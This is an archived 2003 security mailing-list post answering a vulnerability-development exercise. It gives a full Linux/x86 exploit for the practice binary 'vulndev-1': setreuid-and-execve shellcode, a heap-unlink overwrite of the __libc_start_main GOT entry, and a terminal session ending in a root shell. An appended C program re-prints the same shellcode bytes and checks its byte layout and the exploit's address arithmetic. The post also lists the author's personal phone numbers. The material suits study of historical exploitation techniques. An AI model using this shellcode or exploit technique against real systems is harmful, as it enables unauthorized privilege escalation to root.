
Re: vulndev-1 exploit.

From: Joel Eriksson <je-vulndev(at)bitnux.com>
Date: Wed May 14 2003 - 05:15:02 EDT

Dear Vulnerability Developers,

Thanks for your remarkably insightful analysis of this utterly complex bug. Heh. Anyway, here's what I came up with. Analyze this! ;-)

PS. Greets to Doug Lee!

[je@vudo ~]$ ADDR=`objdump -R vulndev-1 | awk '$3 == "__libc_start_main" { print $1 }'`
[je@vudo ~]$ echo $ADDR
08049610
[je@vudo ~]$ cat<<EOF>expldev-1.c

/*
 * Exploit (Linux/x86) for vulndev-1.
 *
 * 2003-05-13 - Joel Eriksson (je at 0xbadc0ded.org)
 */

#include <stdlib.h>  /* strtoul() */
#include <string.h>  /* memset(), strlen() */

#include <unistd.h>
#include <stdio.h>

char code[] =

"\xeb\x0e" "AAAAAAAAAAAAAA" /* jmp 0x0e ; unlink() is evil. */ \

        /* setreuid(0,0)                                                */ \

"\x31\xc0" /* xor %eax,%eax */ \
"\x31\xdb" /* xor %ebx,%ebx */ \
"\x31\xc9" /* xor %ecx,%ecx */ \
"\xb0\x46" /* mov $0x46,%al */ \
"\xcd\x80" /* int $0x80 */ \
/* execve("/bin/sh", "/bin/sh", NULL) */ \
"\x31\xd2" /* xorl %edx,%edx */ \
"\x52" /* pushl %edx */ \
"\x68\x6e\x2f\x73\x68" /* pushl $0x68732f6e */ \
"\x68\x2f\x2f\x62\x69" /* pushl $0x69622f2f */ \
"\x89\xe3" /* movl %esp,%ebx */ \
"\x52" /* pushl %edx */ \
"\x53" /* pushl %ebx */ \
"\x89\xe1" /* movl %esp,%ecx */ \
"\x8d\x42\x0b" /* leal 0xb(%edx),%eax */ \
"\xcd\x80"; /* int $0x80 */
#define DEF_PROG "./vulndev-1"
#define DEF_ADDR 0x$ADDR /* __libc_start_main GOT-jumpslot, filled in by the heredoc */
#define BUF_SIZE 252
#define BOF_SIZE 1

int main(int argc, char **argv)
{

        unsigned int code_addr = 0xc0000000 - 4, dest_addr = DEF_ADDR;
        char *envp[] = { code, NULL };
        char *prog = DEF_PROG;
        char arg1[BUF_SIZE+BOF_SIZE+1];
        char arg2[9];

        if (argc >= 2)
                prog = argv[1];
        if (argc >= 3)
                dest_addr = strtoul(argv[2], NULL, 16);

        memset(arg1, 'A', BUF_SIZE+BOF_SIZE);
        arg1[sizeof(arg1)-1] = '\0';

        code_addr -= strlen(prog) + 1;
        code_addr -= strlen(code) + 1;

        *((unsigned int *) &arg2[0]) = code_addr;
        *((unsigned int *) &arg2[4]) = dest_addr;

        fprintf(stderr, "0x%08x\n", code_addr);
        execle(prog, prog, arg1, arg2, NULL, envp);
        perror("exec");
        return 1;

}
EOF
[je@vudo ~]$ gcc -o expldev-1 expldev-1.c
[je@vudo ~]$ ./expldev-1
0xbfffffbd
sh-2.05b# whoami
root
sh-2.05b#
-- 
Joel Eriksson 
-------------------------------------------------
Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37
Security Research & Systems Development at Bitnux
PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
-------------------------------------------------
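Added example, not part of Joel's post: a small C program that checks the properties the exploit above silently relies on, using only the bytes and numbers in the message. It verifies that the shellcode contains no NUL byte (it is passed to execle() as an environment string and sized with strlen()), decodes the leading short jmp to show that a 4-byte write into offsets 12..15 of the landing pad (where unlink()'s FD->bk store lands if FD points at the shellcode, which is presumably what "unlink() is evil" refers to) cannot touch any executed instruction, rebuilds the "//bin/sh" path from the two pushl instructions, and reproduces the code_addr arithmetic that printed 0xbfffffbd. The function names (nul_free, short_jmp_target, write_is_absorbed, pushed_string, predict_env_addr) are this example's own, and the stack layout assumed by predict_env_addr is the exploit's own 2003-era, non-randomised 32-bit Linux model.

```c
/*
 * Added example (not from the post): static checks on the shellcode and
 * address arithmetic in expldev-1.c.  Everything here is derived from the
 * bytes and numbers in the message; the function names are this example's own.
 */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The 50 shellcode bytes from expldev-1.c, copied verbatim. */
static const unsigned char code[] =
    "\xeb\x0e" "AAAAAAAAAAAAAA"          /* jmp +14 over the landing pad   */
    "\x31\xc0" "\x31\xdb" "\x31\xc9"     /* setreuid(0,0)                  */
    "\xb0\x46" "\xcd\x80"
    "\x31\xd2" "\x52"                    /* NUL terminator for the path    */
    "\x68\x6e\x2f\x73\x68"               /* pushl "n/sh"                   */
    "\x68\x2f\x2f\x62\x69"               /* pushl "//bi"                   */
    "\x89\xe3" "\x52" "\x53" "\x89\xe1"  /* ebx = path, ecx = argv         */
    "\x8d\x42\x0b" "\xcd\x80";           /* eax = 11, execve               */
#define CODE_LEN (sizeof(code) - 1)

/* 1 if no NUL occurs in buf[0..len): the exploit hands the shellcode to
 * execle() as an environment string and sizes it with strlen(), so a NUL
 * anywhere inside would truncate it. */
int nul_free(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0)
            return 0;
    return 1;
}

/* Decode a short jump (EB rel8) at off and return the target offset inside
 * buf, or -1 if there is no short jump there. */
long short_jmp_target(const unsigned char *buf, size_t len, size_t off)
{
    if (off + 2 > len || buf[off] != 0xeb)
        return -1;
    return (long)off + 2 + (signed char)buf[off + 1];
}

/* 1 if a write covering [lo, hi) lands entirely in the bytes the leading
 * jmp skips, so it cannot damage any instruction that executes.  The
 * "unlink() is evil" pad exists for this: unlink()'s FD->bk store hits
 * offsets 12..15 of whatever FD points at (assumption about the comment). */
int write_is_absorbed(const unsigned char *buf, size_t len, size_t lo, size_t hi)
{
    long t = short_jmp_target(buf, len, 0);
    return t >= 0 && lo >= 2 && hi <= (size_t)t;
}

/* Rebuild the string assembled by consecutive "pushl $imm32" (opcode 0x68)
 * instructions starting at off.  Pushes grow the stack downward, so the
 * last push supplies the lowest four bytes of the resulting string. */
int pushed_string(const unsigned char *buf, size_t len, size_t off,
                  char *out, size_t outlen)
{
    size_t n = 0, end = off;
    while (end + 5 <= len && buf[end] == 0x68) {
        n++;
        end += 5;
    }
    if (n == 0 || n * 4 + 1 > outlen)
        return -1;
    for (size_t i = 0; i < n; i++)
        memcpy(out + i * 4, buf + end - 5 * (i + 1) + 1, 4);
    out[n * 4] = '\0';
    return (int)(n * 4);
}

/* Convenience wrapper: 1 if the pushes at off assemble exactly `expect`. */
int pushed_string_is(size_t off, const char *expect)
{
    char tmp[32];
    return pushed_string(code, CODE_LEN, off, tmp, sizeof tmp) > 0 &&
           strcmp(tmp, expect) == 0;
}

/* The exploit's model of where its single environment string lands on a
 * 2003-era 32-bit Linux stack: a 4-byte terminator word below stack_top,
 * then the program path, then the environment string (no randomisation). */
unsigned int predict_env_addr(unsigned int stack_top, const char *prog,
                              size_t code_len)
{
    unsigned int a = stack_top - 4;
    a -= strlen(prog) + 1;
    a -= code_len + 1;
    return a;
}

int main(void)
{
    char path[32];

    printf("length          : %zu bytes\n", CODE_LEN);
    printf("NUL-free        : %s\n", nul_free(code, CODE_LEN) ? "yes" : "no");
    printf("jmp lands at    : %ld\n", short_jmp_target(code, CODE_LEN, 0));
    printf("write 12..16 ok : %s\n",
           write_is_absorbed(code, CODE_LEN, 12, 16) ? "yes" : "no");
    if (pushed_string(code, CODE_LEN, 29, path, sizeof path) > 0)
        printf("execve path     : %s\n", path);
    printf("shellcode addr  : 0x%08x\n",
           predict_env_addr(0xc0000000u, "./vulndev-1", CODE_LEN));
    return 0;
}
```

The "//bin/sh" with the doubled slash is what makes the path exactly eight bytes, so it fits two 4-byte pushes with the NUL supplied by the preceding pushl %edx; and predict_env_addr only matches the 0xbfffffbd the run above prints because nothing else sits between the program name and the one environment string, which is why the exploit passes its own envp to execle() instead of inheriting the caller's environment.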

  • application/pgp-signature attachment: stored
Received on Wed May 14 11:21:46 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT

